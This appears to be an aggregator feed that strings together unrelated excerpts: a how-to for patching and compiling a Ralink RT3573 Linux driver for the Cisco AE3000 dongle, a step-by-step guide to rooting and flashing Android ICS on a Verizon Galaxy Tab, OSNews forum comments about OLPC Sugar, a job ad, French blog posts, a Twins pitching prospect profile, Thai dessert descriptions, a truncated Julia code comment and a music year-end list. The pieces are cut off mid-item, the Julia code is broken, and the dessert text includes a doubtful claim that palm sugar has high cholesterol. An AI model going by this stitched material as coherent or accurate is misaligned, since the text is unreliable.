Finally decided to dig into the bare metal, and figured a working solution. Why ndiswrapper when you can get it working natively? So ventured into it, and after 30 minutes of trials and errands, got the "Blue LED" blinking!! and thought might as well share it here, so that someone could benefit from it.

First, why it won't work either way.

1. NDISWRAPPER 1.57(the default that ships with Ubuntu 12.04) needs the 64 bit windows driver, and cisco does not ship the driver with the CD that is included with the WiFi dongle or is it available in the CCO website. I tested using the ndiswrapper on a 32bit ubuntu and even then it complained and was not working. So if you use the "x86" driver under the Windows XP folder in the package cd (Don't use Windows Vista or Windows 7 drivers with ndiswrapper, they are not supported for any cards AFAIK) you could get an error saying "64 bit kernel detected by ndiswrapper". So bottom line it won't work.

2. Option 2, rt2800usb the default module for majority of Ralink chipsets, that comes included with the kernel does not support RT3573 (the chipset used in Cisco AE3000) chipsets. Why? rt3573 is a 3x3 chipset, a relatively new one to linux kernel, and development work is on-going.

3. So! why not go to the chipset vendor and ask for the driver? Thank god it is OPENSOURCE !! Problem, compilation works, module gets installed, but the "Blue LED" won't blink !!!  why ! because it still doesn't recognize the usb device as a WiFi dongle. The AE3000 is not part of the usb device table.

So solution!., start coding!

1. Download and extract the source (provided here). Extract it anywhere doesn't matter.

2. Navigate to the source folder.

3. Make sureyou have "g++", "build-essential" and "linux-headers" installed.

[The above steps are pretty basic, so i'm not posting the commands]

4. Navigate to the following folder and open the file below in your favorite editor.

cd <driver-source-folder>
vim common/rtusb_dev_id.c

5. Look for the following lines, and add the line highlighted in bold. 
[Note: the line highlighted in bold, is the only change you need to make. Its vendor id for Cisco AE3000.]

#ifdef RT3573
    {USB_DEVICE(0x148F,0x3573)}, /* Ralink 3573 */
    {USB_DEVICE(0x7392,0x7733)}, /* Edimax */
    {USB_DEVICE(0x0B05,0x17AD)}, /*ASUS */
    {USB_DEVICE(0x13B1,0x003B)}, /* Cisco LinkSys AE3000 */
#endif /* RT3573 */

6. Close the file, and compile and install the driver.

sudo make -j10 <------- "sudo" is needed
sudo make install

sudo depmod -a
sudo modprobe -v rt3573sta

Bingo !! LED will blink and your device is ready to use.

Easy Enough !! Please add a '+1' :p :) !!


          Loading ICE CREAM SANDWICH on a Verizon CDMA Samsung Galaxy Tab   
[Disclaimer: Contents in this post, could lead to bricking your tablet. Do not blame me for a burnt tablet. You will try it under your own responsibility. My only contribution is putting all the steps that i went through and have shared my personal experiences and emotions in this blog. As such the low level kernel stuffs were done by many many geniuses, and their links are spread all over the internet in XDA, Rootzwiki, MyDroidWorld and many many other forums]

OK with the disclaimer on , just protected myself against any potential law suits :).
Fine now, getting my hands dirty on my first ever experimental rooting stuffs. Honestly, i have never tried rooting until this post.
I purchased my first tablet computer, the Verizon CDMA 7" Galaxy Tab in February. I have heard stories of people experimenting with custom ROM and Cyanogen Mod, honestly i had appreciated all their work only by reading the posts. All of a sudden, at the stroke of a lightening, i realized, "why not experiment for myself, what worse could happen, i would end up with a 200$ brick!, (Well!, that is not entirely true!!, you will see why in my experiences below - in short, i bricked my galaxy tab 17 times!! before i got it all right, so don't panic, unless you are extremely careless, you can still recover it! [ read the disclaimer].
Through all my search and findings, which was fruitful in a way!, i envisioned writing my experiences in this blog as a one shot hub which amalgamates all the steps that are required right from stock factory sealed to ice-cream sandwich(Android 4.0.1) rooted tablet. I will try to include all the software's that i had used and post as many links that are required to get the tasks done.

[Working in this ICS ROM]
1. wifi little flaky while re-scanning networks, but its ok for alpha. Connection works perfectly.
2. bluetooth
3. GPS
4. Sdcard

[Please let me know if any links does not work, i shall repost them. If any step fails, please let me know, i will update it correctly]
[If you bricked your device because of the steps, most like you can unbrick it using heimdall - steps mentioned below to stock rom, but use under your own risk.]

Ok enough said, now to work!

1. Get a Samsung Galaxy tab from some retail store or online. If you are like me, owning a CDMA Verizon Galaxy Tab, read on!.

2. The steps are __only__ for Verizon CDMA Galaxy Tab, i have not tried this on  any other device.

3. If you have the stock Froyo, Lets first upgrade that. We need to have a rooted ROM to install ClockWorkMod(CWM). CWM is an application by itself, which facilitates easy installation of custom ROMs, on android devices.

4. Installing Heimdall 1.1.1: Grab Heimdall. Heimdall is a tool used to flash kernel and ROM (aka firmware). At the time of writing, Heimdall is at 1.3.1, but I'm old school, and i always preferred 1.1.1 and it has worked well for me. I will therefore stick with it and the software can be obtained from the Heimdall download link.

5. Extract the compressed file to a folder, and keep it aside, we will come back to this later.

6. Installing Windows USB device drivers for your Galaxy Tab: Download the Samsung Galaxy Tab Windows 7(or your appropriate OS) USB driver from the link. The link will lead to installation of Samsung Kies software. Connect your tab to the PC, and install the driver using Samsung Kies software.

7. Now launch the "Zadig" software from the extracted Heimdall folder, which is under the "Drivers" folder of the extracted Heimdall tool.
8. Under "Options" select "List all Devices, and if you had installed the USB device driver correctly in the earlier steps, you will find "Samsung Android Composite ADB Interface" under the "USB Devices" drop-down list.

9. Now choose "Install Driver", and accept the warning message. This is a one time process and from now on, you wouldn't have to repeat the steps 6 through 9.

10. Flashing a rooted Verizon Stock Gingerbread kernel: I got my rooted stock ROM from the link, and details on how to flash is below or you could refer to the post at XDA.

11. Place the Galaxy Tab in Download mode. Power off the device. Power on again by holding the "Power + Volume Down" buttons together for about 3-4 seconds. You will see a "Downloading Message".

12. Open the "heimdall-frontend.exe" from the extracted heimdall folder.
13. Place all the files from the extracted stock ROM in the correct locations. [It is very important that you do this step correctly, if you need your galaxy tab]
FactoryFS = factoryfs.rfs
Kernel (zImage) = zImage
Param.lfs = param.lfs
Cache = cache.rfs
Database Data = dbdata.rfs
Recovery = recovery.bin

14. Once the files are placed appropriately, click "Start". Please wait patiently for sometime and your galaxy tab will reboot by itself once the process is completed successfully. You may have to push "Start" couple of times before it works correctly.
15. Once the Tab reboots, power down the tab immediately [do not let it power up fully, after flashing].

16. Power up again in recovery mode by holding the "Power + Volume Up" buttons together for about 3-4 seconds and once you see the "Samsung" Logo still continuing to hold the "Volume Up" button leave the "Power" button. You will see a "Recovery mode". This is "Android System Recovery" software, not ClockWorkMod recovery[we will install this later].
17. Once in recovery, use the "Volume" buttons to navigate up or down and the "Home" button for "Enter" key. Wipe "data/cache" and "cache" partitions, and reboot.
18. You now have a fully working "Rooted Verizon Stock Gingerbread 2.3.5" with RFS partition system format[what this is, i will come to it later]. You can stop at this point if you feel so.
 
19. Converting File System to EXT4: Now, we need to convert our file system to EXT4 partition type. Why? because it will be faster!, user experience and app loading will be better off in EXT4 format and for the ICS port that I'm using, it is required that you have already a Gingerbread boot loader on a EXT4 partition. I was originally stuck here for long hours, until some experimentation.
20.  I navigated to the forum in RootzWiki by [Cdma] [Vzwtab] Cm7 Beta-Kang [Unofficial] 11/01. I grabbed the recovery tool which is ClockWorkMod 5.0.2.7. [ Copyright notice - This link is from my ftp site, but all copyrights and ownership belongs to the original author of ClockWordMod tool. Since the original  download link no longer exists, i have placed a copy of the file in my FTP for convenience and download. ]
21. Before proceeding any further, it is very important that you have all the future files mentioned below in your Galaxy Tab's SDCARD. Do so if you don't want to repeat all the steps mentioned above again. 
22. I grabbed the CM-7.1 ROM from the above forum as well. Then i navigated to this forum for fetching the AOSP ICS / CM9 for the CDMA Build 3 ROM and the corresponding google apps. [ Upgrading to any AOSP ICS Build is up to the discretionary of the end user. I would recommend reading the cautionary notes from the original post, I'm not responsible for burned boards. Also the later builds e.g Build 5 onward, the file-system is again changed. I would recommend, first upgrading to Build 3 and then Build 7. ]

Connect your Tab to the PC and mount the SD Card and copy the downloaded files to your sdcard. [Do not extract the zip file. Copy the zip file.]

23. Flash CWM 5.0.2.7: Now open heimdall-frontend again. Place your Galaxy tab in download mode as explained in step 11. In Heimdall, place all the files in the correct locations. [It is very important that you do this step correctly, if you need your galaxy tab]
Kernel (zImage) = zImage [ from unzipped CWM 5.0.2.7 tar file]
Recovery = recovery.bin
[ from unzipped CWM 5.0.2.7 tar file]

24. Galaxy Tab will reboot and put it in recovery mode as explained in step 16. Now unlike the earlier "Android Recovery Manager" you will see a "ClockWorkMod" recovery manager. This will have more options than the earlier one. If you don't see this, then something is wrong, and let me know, i will see if some steps have been missed. But on reboot, you should still have a rooted gingerbread.

25. Update to CM7.1:  In the recovery mode(Volume Up/Down - navigation and "Power" button is Enter key, navigate to "mounts and storage" and Format only the following "/system, /data, /cache". Hit "Go Back" and "Wipe data/factory reset and cache partition"

26. Select "Install zip from sdcard" and select your zip file, and select your custom ROM. "Select the CM-7.1 ROM". It is very important you first select this because, this ROM installation will convert your partition type from RFS to EXT4 automatically.

27. Reboot and enjoy fully working CM7.1 gingerbread ROM. You can stop here if you wish or proceed further for ICS, but this is a very stable ROM from my personal usage perspective.

28. Reboot into recovery similar to step 25 onwards to step 27, but instead of the CM7.1 ROM select your ICS ROM in the "install zip from sdcard". Reboot and enjoy ICS.

29. Installing Google Apps: This Rom or the step 25 ROM does not come with google apps pre-installed, meaning you have to install it separately.

30. Reboot into recovery mode, and under "mounts and storage" select "Mount /system". It is very Important that you DO NOT FORMAT or wipe any folder or partition. Select the "gapps-final.zip" from the sdcard and install it by selecting "install zip from sdcard".

31. Reboot and enjoy ICS
What it will look like after all steps:


          RE[4]: How ridiculous   
Sugar has a feature built right into the interface that opens the source code for any application. That's got to be the most transparent user interface ever devised, trumping "view source" in the web browser. How does Sugar "keep Linux hidden"? By not being KDE or GNOME? Come on, you'll have to do better than that on this site... In any case, the OLPC objective is more about free software than Linux in particular. So if it emphasizes to these kids the importance of choosing free software in general rather than merely choosing a free software kernel, then they're doing the right thing. Linux is often the most suitable kernel for any given free software product, but it's not enough to have the growing and youthful middle classes in developing nations worshiping Linux as the key to achieving independence from the multinational vendors. The whole stack must be free, end-to-end, in order for these people, their businesses, and their governments to bring themselves into the digital cloud age while retaining their cultural identities and regaining their economic independence. The kernel probably isn't the package that will see the most development from the XO community in the short-term. The work is likely to focus on Sugar, the core applications, and other user-visible components. So it's important that Sugar is clean and hackable. Although KDE, especially KDE4, is pretty hackable for those who grok C++, it has more of a learning curve. It's not clear how useful it would be on a machine with such meager hardware and screen real estate. This is some delusional Western imperialist mindset. Who gave anybody the right to go and define what it means to be a "pro" at doing stuff with computers? Give these people, especially the kids, some time with open hardware and open software, and they will surely develop amazing skills and functionality. These people deserve better than figurative "Windows" into the conventional wisdom that locks them into the indentured servitude of global capitalism. They deserve an equal playing field that offer limitless possibilities for innovation and empowerment. KDE and GNOME have a lot of our Windows-tainted conventional wisdom and cultural DNA already baked in. They already have their visions more or less in focus within their development communities. I think it's better for everyone to give fresh minds a fresh whack at a relatively clean slate. They will show us that "pro" comes in all shapes, sizes, colors, and income levels. Let us have a little more faith in humanity, and let those of us living in relative comfort resolve for the coming new year to consider the economic, cultural, and spiritual value of bringing hope and opportunity to the lives of the world's vast underclasses.Edited 2007-12-06 20:10
          RE: swine   
Quite frankly, you're full of sh**e. Windows is just a kernel, just as Linux is just a kernel. Microsoft can and does have minimal configurations.
          RE[5]: How ridiculous   
Quite aside from the other inaccuracies in this post that have already been addressed we have: How are foreign kids going to benefit from being able to look at obfuscated, ill-documented C code with comments, variable names method names, class names, and library names written in English? And not even full English sentences, mind you, but a horribly contracted version (HorCntrVers) that's barely readable even to a native English speaker? The OLPC's Sugar environment unlike the Linux kernel is not written in C but rather in Python. Python is an excellent language for learning programing. As for the use of English, you have to learn some English to program, as virtually all programming languages including those developed by non first language English speakers are written in English anyway. Learning English is educational too.
          apps-extra/rsyslog-8.28.0-1-x86_64   
Enhanced system logging and kernel message trapping daemon
          Data Center/Server Engineer - Intel - San Jose, CA   
The engineer will be responsible for handling all aspects of OS, Data Center software, Kernel, and middleware....
From Intel - Sat, 17 Jun 2017 10:23:09 GMT - View all San Jose, CA jobs
          Control+T in Terminal shows time snapshot   
Not sure if this was available before 10.7, but hitting Control+T while running a command in the Terminal will show what process is executing, the load, the PID of the process and its user and kernel time.

I was running a script and accidentally hit Control+T instead of Command+T to create a new tab. I was surprised at what I got. Here is an example of what gets printed:
# buildOrder.py
load: 2.51  cmd: p4 15179 running 0.00u 0.00s
load: 2.23  cmd: p4 17962 waiting 0.01u 0.00s
load: 2.53  cmd: Python 15167 running 94.68u 66.33s
load: 2.60  cmd: Python 15167 running 150.71u 101.82s

[crarko adds: I wasn't able to reproduce this, but it may be due to the briefness of the running command. Give it a try and post a comment about your results. Try it in Snow Leopard too if you ...
          Le Mois anglais saison 6 : let's get started !   

Aujourd'hui débute le Mois anglais et, à défaut d'avoir prévu une chronique, je me suis dit que c'était l'occasion de partager quelques photos et sources d'inspiration pour ce nouveau mois.

PAL01.jpg

Une petite partie de ma PAL (une rangée derrière une autre que je n'ai pas encore eu l'occasion de prendre en photo). Elle comprend notamment quelques cadeaux et des acquisitions récentes, lors de mes deux derniers voyages anglais. En revoyant la photo je réalise que j'ai encore plus de titres à lire ce mois-ci et que, décidément, je ne découvrirai que la plus petite partie visible de l'iceberg ! Cryssilda, tu remarqueras les titres Necropolis et Bedlam (tu me reconnaîtras bien là !).

cambridge2017_01.jpg

Photo : Copyright MyLouBook

En 2017, il devrait y avoir par ici de la verdure... les beaux paysages de campagne et les villages des Cotswolds ainsi que les jolis parcs de Cambridge.

cambridge2017_03.jpg

Photo : Copyright MyLouBook

Du thé, et des tea times !

cambridge2017_04.jpg

Photo : Copyright MyLouBook

Et bien d'autres délices et lieux anglais !

D'ailleurs, cette année, si je partageais quelques objets anglais que j'ai à la maison ? Kitsch et moins kitsch, souvent littéraire et parfois royal, l'objet anglais a envahi mon habitat sans que je m'en aperçoive.

******

Côté rendez-vous et lectures communes, je verrai bien ce que j'arrive à faire. Voici en tout cas en rose les lectures auxquelles je suis sûre de participer et en bleu celles que j'envisage.

 

Je participerai sans doute également à une journée gourmande en partageant quelques photos de mes derniers séjours.

J'aurais aimé participer à la LC du 1er juin également mais je me suis rendu compte de l'impossibilité de la tâche en découvrant le nombre de pages et la taille de la police de mon exemplaire il y a quelques jours... J'aimerais aussi lire Angela Huth et Daphne Du Maurier mais j'essaie de rester un minimum crédible (hum...).

Sur ce, après ce premier billet dont on voit bien qu'il est largement improvisé et rédigé après une journée intense, il ne me reste plus qu'à vous souhaiter à nouveau un EXCELLENT MOIS ANGLAIS !

mois anglais saison6.jpg

 


          Nouvelles April: Le chaton de l'April sur la ligne de départ   

Les 2 et 3 juin derniers, avait lieu un hackathon à l'Auberge Espagnole à Mons-en-Barœul, près de Lille, pour mettre en œuvre l'infrastructure de base du chaton April. Pendant ces 2 jours, les administrateurs systèmes de l'April ont travaillé d'arrache pied pour faire sortir le chaton de la boîte. À la fin du week end, déjà 5 machines virtuelles ronronnaient sur maine et coon, les deux serveurs physiques qui les hébergent. C'est sur ces machines qu'ont été cuisinés les différents services d'infrastructure : capture d'écran du gestionnaire de machines virtuelles

  • volumes répliqués avec DRBD,
  • machines virtuelles avec KVM/Libvirt,
  • noms de domaines avec Bind,
  • emails avec Posfix,
  • backups avec Borg,
  • web avec NginX,
  • documentation avec Dokuwiki,
le tout arrosé à la sauce Debian Strech et épicé avec beaucoup de configuration de réseau.

À l'issue de ce week end, il restait encore du travail, mais les bases de l'architecture étaient posées. Depuis, les adminsys n'ont pas relâché l'effort et ont installé :

  • le monitoring avec Icinga2,
  • le firewall avec Firehol,
  • des listes de discussions avec Sympa,
  • un mastodon.
un petit chaton qui sort du carton Le chaton de l'April est ainsi très près aujourd'hui de pouvoir commencer à offrir des services au public. De ce fait, si l'aventure vous intéresse, n'hésitez pas à rejoindre l'équipe ! Toutes les bonnes volontés sont utiles : on a besoin de webmasters, de modérateurs, de graphistes, de documentateurs, de développeurs, d'administrateurs, etc.
Nous avons par ailleurs une liste de discussion spécifique à ce projet : chaton@april.org. Vous pouvez vous y inscrire par l'interface web de Sympa.
Un canal IRC est également disponible : #april-chatons sur irc.freenode.net.

L'April adresse un grand bravo à toutes les personnes qui ont participé activement à la mise en place de l'infrastructure : François, Edouard, Quentin, Vincent-Xavier.

Un grand merci également à l'Auberge Espagnole, et à nos amis de ClissXXI pour nous avoir accueillis chez eux.

Enfin, un grand merci à tous les développeurs des nombreux logiciels libres qui rendent cette aventure possible.

A propos du projet chatons

Il y a peu, l'April saluait la naissance du Collectif des Hébergeurs Alternatifs, Transparents, Ouverts, Neutres et Solidaires (CHATONS).

L'April propose d'ores et déjà différents services en ligne, libres et loyaux, à ses membres. Elle souhaite cependant aller plus loin en proposant certains services à tout le monde. C'est pourquoi l'April participe aux CHATONS. Il est temps pour le chaton de l'April de sortir du carton.

Image chaton : "By 0x010C (Own work) [CC BY-SA 4.0 (http://creativecommons.org/licenses/by-sa/4.0)], via Wikimedia Commons"


          Get To Know: Felix Jorge   
Photo Credit: Seth Stohs, Twins Daily
Felix Jorge will be making his big league debut on Saturday but he's probably a name that isn't familiar to a lot of fans. The 23-year old right-handed pitcher has been in the Twins organization since 2011 when he signed out of the Dominican Republic. I recently named him the ninth best prospect in the Twins organization. As with any pitching prospect, there have been some ups and downs during the professional tenure of Mr. Jorge.

Before he makes his big league debut, here's your opportunity to get to know Felix Jorge.

Rookie Leagues
Jorge made his professional debut as a 17-year old in the Dominican Summer League. In nine appearances (five starts), he allowed eight earned runs (2.67 ERA) with 26 strikeouts and nine walks. He'd come stateside in 2012 and pitch for the GCL Twins. Across 34.2 innings, he allowed nine earned runs while improving his SO/9 from 8.7 to 9.6. He moved up the ladder again in 2013 as he headed to Elizabethton where he combined for a 2-2 record with a 2.95 ERA. Jorge was establishing himself as one of the Twins' top pitching prospects.

2014 Struggles
The Twins organization continued to be aggressive with Jorge to start the 2014 campaign. He was sent to Cedar Rapids to start the season and he struggled for the first time in his professional career. Jorge was knocked around for 39 runs in 39 innings including nine home runs. The Kernels tried to move him to the bullpen to find some success but even that plan didn't work. By the end of May, he was sent back to extended spring training with plenty of question marks surrounding his future.

Bouncing Back
It would be an understatement to say Jorge bounced back strongly from his early season struggles. Jorge finally had something click when he returned to Elizabethton for the second-half of the 2014 campaign. He would be named the Appalachian League Pitcher of the Year as he went 4-2 with a 2.59 ERA and a 1.09 WHIP. He posted a 61 to 14 strikeout to walk ratio over 66 innings. From this point forward, Jorge would become the most consistent starting pitcher in the Twins organization.

During the 2015 campaign, Jorge would spend the entire season at Cedar Rapids, the site of his biggest professional failure. While being almost a year younger than the competition, he posted a 2.79 ERA and a 1.06 WHIP. He posted career highs in innings pitched (142), strikeouts (114), wins (6), and starts (22).

Upper Minors
The 2016 season saw him take the next step as he split time between High-A and Double-A. Through his first seven starts, he posted a 2.00 ERA with 38 strikeouts in 45.0 IP. From May 26-July 5, he reeled off seven straight victories while averaging over six innings per start. During this stretch, he had a 1.13 ERA and held opponents to a .549 OPS. His impressive stretch meant he was named the starter for the FSL South Division All-Stars. His first six starts at Double-A saw him post an ERA north of 5.00. From there, he settled in with a 3.16 ERA while averaging more than seven innings per start in his last five appearances.

Jorge was added to the 40-man roster leading into the 2017 season. This is one of the reasons he will be making a start on Saturday as the Twins needed someone to make a spot start. However, he has been doing well in his second stint at Double-A. Through 14 starts, he has a 3.26 ERA and a 61 to 22 strikeout to walk ratio. His eight wins are the second most in the entire Southern League.

Scouting Report
The Twins list Jorge at 6-foot-2 and 170 pounds so he doesn't exactly look overpowering on the mound. He can hit in the low 90s with his fastball which can surprise some hitters because of his size. He doesn't strikeout a lot of batters but he always stays around the zone. Jorge prefers to pitch in the lower half of the zone so he can coax ground balls from the batters. He also uses a change up and a late-breaking slider to help him get some more ground ball outs. Overall, the hope would be that he can develop into a mid-rotation starter that can help the Twins as they fight their way back into contention.
          2 Slackware Updates   
The following updates has been released for Slackware Linux: glibc (SSA:2017-181-01) kernel (SSA:2017-181-02)...
          d2k17 hackathon report: Martin Pieuchot on moving the network stack out of the big lock   
Our next report from the d2k17 hackathon comes from Martin Pieuchot, who writes:

Hackathons are generally good to start or finish something, at Starnberg I managed to do both.
I came to unlock the forwarding path and thanks to the multiple reviews from bluhm@, sashan@ and claudio@ it happened! It started as a boring hackathon because I had to review and fix all the abuses of splnet() in pseudo drivers but then it went very smoothly. I still haven't seen a bug report about the unlock and Hrvoje Popovski even reported a 20% forwarding performance increase.

Then I started discussing and planning the next big step with claudio@ and bluhm@. How to unlock the socket layer? Well it's happening! During the hackathon Claudio sent some diffs to start unlocking pfkey and routing sockets and since then I started working on TCP receive side.

In the meantime I had to commit my futex(2) based mutex and condition variable implementations for our libpthread. This improves the performance of threaded applications a lot, which means most of ports.

I also did some cleanups to help towards having MI mutex and kernel lock implementations. This should allow all our archs to benefit from the lock instrumentations visa@ and jmatthew@ are working on.

Finally I committed some ddb(4) cleanups, mostly CTF related.

Thanks to mpf@ and genua for organizing this hackathon!

Thanks for the report, Martin!

It is worth noting that most, if not all, of the code mentioned here is already doing good work in recent snapshots.


          intel NUC6CAYH no audio out via HDMI in Linux   

Affected : intel NUC6CAYH

 

Expected behavior :

HDMI audio output to Television HDMI 2.0

 

Observed behavior :

Windows 10 : No HDMI audio output at any resolution.

Xubuntu 17.04 (Kernel 4.10x) : No HDMI audio at any resolution.

Librelec 8.02 : No HDMI audio at any resolution.

 

Actions :

Updated BIOS to latest AYAPLCEL.86A.0038 (http://intel.ly/2t4MscK)

Updated Megachip HDMI Firmware to 1.66 via Windows only software (http://intel.ly/2tI9kwH)

 

Repeat test observed behavior:

Windows 10 : HDMI audio output as expected at all resolutions.

Xubuntu 17.04 (Kernel 4.10x) : No HDMI audio at any resolution.

Librelec 8.02 : No HDMI audio at any resolution.

 

Reference:

MCDP28x0 DisplayPort1.2a-to-HDMI 2.0 Converter

http://www.megachips.com/products/displayport/MCDP28x0

 

Filed a bug at Linux DRI, informed 'it works for everybody'.

Clearly it does'nt...

 

Suggestions?


          DESSERTS AND SWEET SNACKS   

Desserts and sweet snacks
Most Thai meals finish with fresh fruit but sometimes a sweet snack will be served as a dessert.


Chaokuai

Chaokuai - grass jelly is often served with only shaved ice and brown sugar.
Chaokuai can be eaten in many ways to enhance its taste and make it more delicious. It is completely up to you on how you choose to have this dessert.


Khanom bua loi


Khanom bua loi – taro root mixed with flour into balls in coconut milk
This traditional dish is often prepared and eaten during festivals and special occasions. It is served in buffet with other desserts after the main course meal. You can add sweet corn kernels to the dessert and savor it just like some Thais love eating it. Traditionally, in Thailand the khanom bua loi is served with a syrup poached egg as topping for the dessert.


Khanom chan


Khanom chan – multi-layers of pandan-flavored sticky rice flour mixed with coconut milk.
Khanom chan is a delicious product of the thai cuisine. A well made khanom chan is sweet, which has made it a choice of even the most discrete palate. Khanom chan has become one of the most popular dessert around the world


Khanom mo kaeng


Khanom mo kaeng - a sweet baked pudding containing coconut milk, eggs, palm sugar and flour, sprinkled with sweet fried onions.
Kha-nom Mo Gaeng is one of our famous Thai dessert. Maybe you have a question why Thai people choose palm sugar for all kind of food, especially when we cook Thai dessert. Palm sugar has a nice color and odor, and of course its unique taste with high cholesterol. 
No wonder I am getting fat!




Khanom tan




Khanom tan – palm flavored mini cake with shredded coconut on top.
The fruit from toddy palms can also be eaten and are rich in vitamins A and C, and can be eaten as young fruits, which are soft and juicy and somewhat like lychees but milder and with no pit, or old fruits, which are harder and less juicy. It is this toddy palm pulp that these cakes are made of, along with rice flour, yeast, palm sugar, coconut cream and coconut milk. Toddy Palm Cake they're kind of like sponge cake, a little sweet and different tasting than regular sugar.

Khanom thuai talai' - steamed sweet coconut jelly and cream.
Khanom thuai talai is prepared by steaming. It is generally regarded dessert. It is well liked among those who love sweet food. Khanom thuai talai comes under the class of thai foods.


Khao niao mamuang




Khao niao mamuang - sticky rice cooked in sweetened thick coconut milk, served with slices of ripe mango.
This luscious dessert is a form of rice pudding that is paired with mangos at the peak of their ripeness. Sweet and rich, khao niao mamuang is a favorite way to finish any Thai meal.


Lot chong nam kathi


Lot chong nam kathi – pandan flavored rice flour noodles in coconut milk, similar to the Indonesian cendol.
Popularly known as a thai food, lot chong nam kathi, eaten as dessert, is popular in many different cuisines across the world. It is an item of choice for those who prefer sweet foods.


Ruam mit 


Ruam mit – mixed ingredients, such as chestnuts covered in flour, jackfruit, lotus root, tapioca, and lot chong, in coconut milk.
Ruam Mit in local parlance means ‘social cohesion of diverse elements’, and true to its name, Thai’s exclusive dessert upholds the meaning of Ruam Mit in all possible ways.
Before we step into the techniques of how to eat Ruam Mit, lets explore what are the ingredients which make up this sweet Thai delicacy and how to relish it, as an experience to cherish?
Ruam Mit mainly comprises jackfruit(fruit of the mulberry family), flour-coated chestnuts, lotus root, tapioca and lot chong(pandan-flavored rice noodles) in a bath of coconut milk, and the aroma of jasmine.


Sarim
Sarim – multi-colored mung bean flour noodles in sweetened coconut milk served with crushed ice.
Sangkhaya fak thong


Sangkhaya fak thong - egg and coconut custard served with pumpkin, similar to the coconut jam of Malaysia, Indonesia and the Philippines
A Thai Pumpkin Custard. I'm sure if you cook this menu for dessert maybe for dinner. Your weight will go higher and higher. I rarely eat this menu because I think this is very luscious but the curd of custard is very fantastic too. So I suggest you eat this per month. It's worth to eat more that worried about your weight.


Tako


Tako - jasmine scented coconut pudding set in cups of fragrant pandanus leaf.
The Thai pudding of tako comes with a delicious topping of creamy coconut. And, the best thing about this delicious pudding is that, it’s so smooth that you don’t even have to exercise your teeth much to chew it. The scent of the coconut garnished at the top of the pudding, makes the dessert all the more appetizing.
          Comment on Maximum Product Of Three, Revisited by Zack   
Implementation in Julia. No assumption whatsoever, plus no dependencies (as usual). Kernel version: 0.4.5 function main{T <: Integer}(x::Array{T, 1}) nx = length(x) if nx < 3 println("Array is too short! Please provide at least 3 integers.") return NaN elseif nx == 3 return prod(x) else ind = (x .!= 0) # indexes of 0s nz = sum(ind) z = x[ind] # get rid of all the 0s n = length(z) if n < 3; return 0; end M = typemin(eltype(z)) # start somewhere super low for i = 1:(n-2) for j = (i+1):(n-1) for k = (j+1):n M = max(M, z[i]*z[j]*z[k]) end end end if (M 0) return 0 else return M end end end
          Software Development Engineer (Kernel Graphics Driver macOS) - Advanced Micro Devices, Inc. - Markham, ON   
What you do at AMD changes everything At AMD, we push the boundaries of what is possible. We believe in changing the world for the better by driving
From Advanced Micro Devices, Inc. - Mon, 26 Jun 2017 19:57:34 GMT - View all Markham, ON jobs
          Reactie op Jaarlijstjes 2015 door JW   
Mocht iemand mijn lijst op FB (ja Wim dus) gemist hebben: 01. The White Birch - The Weight Of Spring (Glitterhouse) 02. Anoice - Into The Shadows (Ricco) 03. Kloster - Half Dream, Half Epiphany (Burnt Toast Vinyl) 04. Sam Lee & Friends - The Fade In Time (The Nest Collective) 05. Ibeyi - Ibeyi (XL Recordings) 06. Yellow6 - No Memories, Only Photographs (Silber) 07. Norn - Usotsuki (Moving Furniture) 08. The Revolutionary Army Of The Infant Jesus - Beauty Will Save The World (Occultation) 09. Mahsa Vahdat - Traces Of An Old Vineyard (Kirkelig Kulturverksted) 10. Watine - Atalaye (Catgang) 11. Esmerine - Lost Voices (Constellation) 12. Oiseaux-Tempête - ÜTOPIYA? (Sub Rosa) 13. Corpo-Mente - Corpo-Mente (Blood Music) 14. Chloe Charles - With Blindfolds On (Make My Day) 15. Peter Kernel - Thrill Addict (On The Camper) 16. Downriver Dead Men Go - Tides (Downriver Dead Men Go) 17. Last Harbour - Caul (Gizeh) 18. Natural Snow Buildings - Terror’s Horns (Ba Da Bing!) 19. Bersarin Quartett - III (Denovali) 20. Manyfingers - The Spectacular Nowhere (Ici D’Ailleurs) Hier met omschrijving (en geluid): http://subjectivisten.nl/?p=4482 De overige 130 nummers 21 (van in totaal 575 nieuwe releases....dus niet zo maar een greep): Chantal Acda - The Sparkle In Our Flaws (Glitterhouse) Amber Asylum - Sin Eater (Prophecy) Ílkay Akkaya - Hayat (Ütopya) Anari - Zure Aurrekari Penalak (Bidehuts) Ólafur Arnalds - Broadchurch (Mercury Classics) Ólafur Arnalds & Alice Sara Ott - The Chopin Project (Mercury Classics) Astrïd - The West Lighthouse Is Not So Far (MonotypeRec) Aidan Baker - Half Lives (Gizeh) The Balustrade Ensemble - Renewed Billiance (Serein) Michel Banabila / Oene van Geel - Music For Viola And Electronics II (Tapu) Beach House - Depression Cherry (Bella Union) Beach House - Thank Your Lucky Stars (Bella Union) Michael Begg | Human Greed - Hivernant (Omnempathy) Bell Witch - Four Phantoms (Profound Lore) Tullia Benedicta - Anteros (Second Language Music) Biosphere / Deathprod - Stator (Touch) Björk - Vulnicura (Wellhart/ One Litte Indian) Boduf Songs - Stench Of Exist (The Flenser) Heather Woods Broderick - Glider (Western Vinyl) Cannibales & Vahinés - Songs For A Free Body (Cannibales & Vahinés) Anna Caragnano & Donato Dozzy - Sintetizzatrice (Spectrum Spools) Ben Chatwin - The Sleeper Awakes (Village Green) Benjamin Clementine - At Least For Now (Behind) Samantha Crain - Under Branch & Thorn & Tree (Full Time Hobby) Daisy Bell - London (Opa Loka Records) Dead Neanderthals - Endless Voids (Alone) The Declining Winter - Home For Lost Souls (Home Assembly Music) Olivier Depardon - Les Saisons Du Silence (Vicious Circle) Aïsha Devi - Of Matter And Spirit (Houndstooth) Diagrams - Chromatics (Full Time Hobby) Disappears - Irreal (Kranky) Ricardo Donoso - Machine To Machine (Denovali) Aurélie Dorzée & Tom Theuns - L’Art De Voler (Homerecords.be) Draff Krimmy & Continental Fruit - Existenz (Fluttery) Emika - Drei (Emika Records) Eviyan - Nayive (Animal Music) The Eye Of Time - Anti (Denovali) Bill Fay - Who Is The Sender? (Dead Oceans) Filiamotsa - Like It Is (Aagoo) Flug 8 - Trans Atlantik (Disko B) Flying Saucer Attack - Instrumentals 2015 (Domino) William Ryan Fritch - Revisionist (Lost Tribe Sound) GABI - Sympathy (Software) Geins't Naït + Petitgand, Laurent - Oublier (Ici D’Ailleurs) Gideon Wolf - Near Dark (cd, Fluid Audio) The Girl Who Cried Wolf - Ruins (The Girl Who Cried Wolf) Godspeed You! Black Emperor - Asunder, Sweet And Other Distress (Constellation) 